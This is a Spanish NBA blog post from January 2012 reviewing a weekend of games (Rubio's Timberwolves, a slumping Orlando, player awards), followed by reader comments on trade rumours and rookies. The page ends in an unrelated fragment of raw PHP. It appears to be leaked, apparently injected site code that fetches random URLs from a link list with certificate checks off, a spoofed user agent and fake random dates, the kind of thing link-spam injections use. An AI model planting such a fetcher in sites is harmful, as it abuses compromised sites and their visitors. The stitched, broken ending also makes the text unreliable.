Informe del fin de semana: Los Magic dan penita

30 de January de 2012 por TheDeerHunter

Resulta reconfortante llegar el lunes y comprobar que hay casi 120 mensajes en el hilo de seguimiento del fin de semana. Nuestros visitantes suben el nivel del blog. En esta ocasión, además de lo estrictamente deportivo ha habido gran expectación por los rumores. ¿La vuelta de Arenas? ¿La salida de Calderón? ¿Trades increíbles que incluyen a D-Howard? De todo nos podemos empapar aquí.

Este fin de semana, como en muchos de los anteriores, el gran foco de atención estuvo en Ricky y los Wolves. Interesantes sensaciones las que nos han transmitido los jóvenes lobeznos, el viernes doblegando a San Antonio y anoche dándole guerra a los Lakers.

De la victoria ante San Antonio algunas pinceladas en forma de comentarios:

“Pekovic esta haciendo un partido muy bueno, esta irreconocible, incluido un movimiento en la zona a Duncan delicatessen total.” (inad23)
“Vaya muñequita que tiene Ricky esta noche… Cómo le ha cogido el tranquillo a esos flotantes desde la bombilla.” (Pop)
“Estoy de acuerdo, Pekovic es un buen pivot y lo demuestra siempre que tiene minutos. Hoy no está Darko = doble-doble.
  Ricky está siendo el mejor de los Wolves de lejos, anotando bien y fluído y repartiendo juego.
  Wesley Johnson taponando a Duncan. Ahora SÍ que lo he visto todo.” (HisRoyalAirness)

Y anoche:

“Ojo al partido de Beasley: 18 puntos (7-15 TC, 2-5 T3 , 2-2 TL), 12 Rebotes (3of , 9def), 3asistencias, 2 robos, 1 pérdida. ¿Lo intercambiamos, o esperamos a ver qué pasa?” Jose Luis
“Los Wolves han jugado los últimos 17 minutos con Ricky-Webster-Beasley-Randolph (que no había jugado hasta entonces)-Love y han remontado 17 puntos, llegándose a poner 2 arriba cuando quedaban 3 minutos de partido.” HeiNeKeN
“Hoy flojito Ricky en tiro, aunque al final los Wolves casi remontan gracias a él.” Sancho88

Del viernes 27, además de la brillante victoria de los Wolves la nueva debacle de Orlando ante Hornets (67-93); los palizones de Rockets y Blazers a Wizards (76-103) y Suns (71-109) respectivamente, las impresionantes actuaciones de Rose, Durant y Pierce… así como la de Rudy, que curiosamente apenas tuvo repercusión aquí. Nuestros visitantes también siguieron con atención la buena imagen (aunque derrota) de los Knicks sin Melo en Miami (89-99), así como la nueva buena actuación de Kemba en la derrota de los Bobcats en Philadelphia (72-89).

El sábado a priori se esperaba algo más flojo. Decepciones con los Gasol en dos derrotas bastante lamentables ante Bucks (89-100) y Suns (84-86), pero a partir de ahí lo más destacado fueron los partidazos de Tyreke Evans y Kemba Walker (firmando éste el triple doble), dos jugadores especialmente apreciados por algunos de nuestros seguidores.

Finalmente anoche, además del agridulce Lakers@Minnesotta, vimos un sensacional Bulls@Heat en el que Rose peleó hasta el último instante el poderío de LeBron y Bosh (93-97); también el gran partido de Cavaliers rompiéndole la racha a Boston (88-87); el partidazo de poder a poder entre Clippers y Nuggets (109-105); también el derbi texano, resuelto en la prórroga a favor de Dallas sobre Spurs (100-101). Orlando sufrió su tercera derrota consecutiva de manos de Pacers (Howard está que brama), un sorprendente DeRozan ajustició a los Nets (94-73) y los Hawks no tuvieron problemas ante los Hornets (94-72), aunque el día anterior estos parecieran el Dream Team dos días ante Orlando.

PREMIOS

MVP: Lebron James ha liderado a los Heat a 2 victorias. En estos 2 partidos ha promediado 33 puntos, 9’5 rebotes y 6 asistencias. Brutal. Kobe Bryant no ha ganado sus 2 partidos pero ha mostrado un nivel acorde al del MVP, 27 puntos, 8 rebotes y 9 asistencias el sábado y 35 puntos y 14 rebotes al día siguiente. Ya es el jugador que más canastas ha logrado en toda la historia de los Lakers.

Rookie: Destacamos a los dos rookies preferidos de melo15. El sábado Kemba Walker consiguió un triple doble (20-10-11) mientras que Kyrie Irving ha cuajado dos grandes partidos este fin de semana. El viernes fueron 32 puntos y 6 rebotes y ayer, 23 puntos, 4 rebotes y 6 asistencias.

Sorpresa: Posiblemente la actuación más sorprendente del fin de semana haya sido la de Rodrigue Beaubois en su partido frente los Jazz: 22 puntos, 6 rebotes, 7 asistencias y 4 tapones.

Decepción: 1 sólo partido ganado de los 10 últimos. 2 derrotas más este fin de semana. Los dedos acusadores empiezan a apuntar descaradamente a Mike D’Antoni. Y el nivel de los Magic en estos 2 últimos partidos es simplemente lamentable.

Esfuerzo en vano: Tan solo Dwight Howard da la cara en estos Magic. El viernes consiguió 28 puntos y 16 rebotes y ayer, 24 puntos y 13 rebotes. Tan claro lo tenían los Pacers que basaron su victoria de ayer en el hack-a-dwight. Supermán sólo fue capaz de anotar 4 de 15 intentos. Así no se puede.

Imágenes | AP Photos / Getty Images

Comenta

57 comentarios a esta entrada

  1. rumbero dice:
    #1

    nba:
    Viendo como esta el percal , trade de Pau , yo veo 3 posibles destinos.
    Knicks : Por Stat. con los rumores de phil jackson y supongo que Pau se adapta a tener en el equipo un acaparador de balon (Melo) y a no tener base ;-PP
    Como los Lakers quieren a dwight, pues stat + bynum+artest por Dwight+ryan anderson-turk..

    bulls : Boozer + moralla por Pau + Artest , considero que Boozer tiene mejor tiro de media distancia y para lo que quiere Brown puede servir .
    Orlando : Pau-Bynum por Dwigth + turko.,

    Que opinais ;-PP

    Para mi el mejor destino sería Bulls sin ninguna duda. Ahora bien, si metes en el pack a Artest va a hacer falta algo más que moralla para equilibrar salarios. El ya famoso Boozer+Korver del trade simulator sería la leche, pero no lo veo, tiene más números de acabar en Orlando que no estaría nada mal

      Citar

  2. Denise dice:
    #2

    melo15: Sobre el draft, no me parece tan malo, esta Irving y Kemba, pedazo de jugadores, y los demas, no son tan malos, Leonard, Markieff, haran carrera seguro, y Brandon Knight, se parece bastante a Billups no creeis?? Despues estan Derrick Williams que no juega, yo lo enviaria a Phoenix por Gortat. Valanciunnas tiene buena pinta, Kanter no juega, y Vasely si mejorara su tiro, seria buenisimo, porque midiendo 2.11

    yo a Derrick Wiliams no lo veo tan bueno como para que los Suns lo cambien por Gortat. Como ya dije en otro comentario, Beasley si lo podrían aceptar por el polaco porque de vez en cuando se puede marcar un partidazo como el de esta noche, y tiene mas calidad que Derrick…aunque a decir verdad yo no lo ficharia para mi equipo.

      Citar

  3. nba dice:
    #3

    Lo de incluir a artest en el trade de Pau a bulls, es porque veo a Artest motivado como el unico en el Este que sería capaza de disminuir la producción de Lebron , en una hipotetica final de conferencia , y a Bosh claramente superado por Pau , ya que Wade y Rose se anularian mutuamente .
    Por lo que si los bulls quieren llegar a la final de la NBA ese es un trade que creo les puede interesar

      Citar

  4. Jose Luis dice:
    #4

    Por supuesto que los Clippers ganaron en el trade por Paul, si fue un robo:

    Gordon que no juega más de 60 partidos al año (y en este, a ver si llega a 20) y encima no quiere renovar (lógico)
    Aminu que ni juega en Hornets, papel residual
    Kaman, bueno, un expiring que ahora quieren traspasar (lo mejor que obtuvieron los Hornets)
    La ronda de Minnesota, que creo que no será ni top 10

    Stern la cagó pero bien

      Citar

  5. Ru dice:
    #5

    Sancho88: Insinuas que Adidas marca la política deportiva de los Bulls? Eso me parece una chorrada, sinceramente

    Como han dicho Magic y rumbero,a quién “orientan” es a Dwight Howard.Si es por la marca,Howard no se va a Chicago y en los tiempos que corren,donde los jugadores TOP reciben el mismo o más dinero vía marcas publicitarias que sus salarios,es algo muy importante.¿Porque va a querer ir Howard a un equipo como los Nets?Brooklynn… $$$

      Citar

  6. Sancho88 dice:
    #6

    Esteban:
    enorme rubio, hoy sivale un mano a mano con irving por el rookie del año, aunque convengamos que es la camda mas floja creo de la que tengo memoria, DIOS WILLIAMS NUMERO 2 DEL DRAFT, sancho88 creo que thebet es tan malo como el jejej ni hablar de vasely, dios q fiasco, que fue? numero 7? tristan thompson un num 4? biyombo un numero 6 o 7?

    los mejores rookies, lejos el uno, uno que fue elegido hace dos años como rubio, o las selecciones bajas, brooks, el de los 76, shumpert, nole, partson etc, que flojo realmente

    no entiendo que esperan los wolves en moverse para fichar a kaman, yo les regalo a beasley y wes jhonson, mas el contrato a punto de finalizar de miller y me traigo a kaman, con el los PO no son algo imposible, en un equipo que funciona bien

    incluso si me apuran tamb les regalo a williams

    Yo también estuve pensando eso el otro día, que los equipos malos de la liga son también malos hasta para elegir algo decente en el draft. Solo 4 tíos del top10 en el sorteo de rookies están entre los diez más valorados de los debutantes…

      Citar

  7. Esteban dice:
    #7

    Jaaja muy bueno sancho! Errores tiene cualquiera, pero es raro q con elecciones tan altas erren asi

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>